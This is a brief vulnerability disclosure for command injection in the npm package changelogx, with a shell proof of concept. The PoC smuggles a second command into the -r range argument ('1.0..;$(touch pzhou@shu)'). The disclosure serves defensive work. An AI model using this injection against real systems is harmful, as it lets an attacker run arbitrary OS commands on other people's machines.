changelogx

vulnerability command injection
severity 7.3
language javascript
registry npm

✍️ Description

The git_helper.getCommits() function in changelogx package whose expects to execute git log command can be illegally injected arbitrary other OS commands by its $range arguments.

🕵️‍♂️ Proof of Concept

// PoC.sh
npm i changelogx -g

git clone https://github.com/royriojas/changelogx.git
cd changelogx

ls 
#you cannot see pzhou@shu
changelogx -r '1.0..;$(touch pzhou@shu)' -o changelog.html
ls 
#you can see pzhou@shu

💥 Impact

This vulnerability is capable of executing arbrtary OS commands by changelogx.

References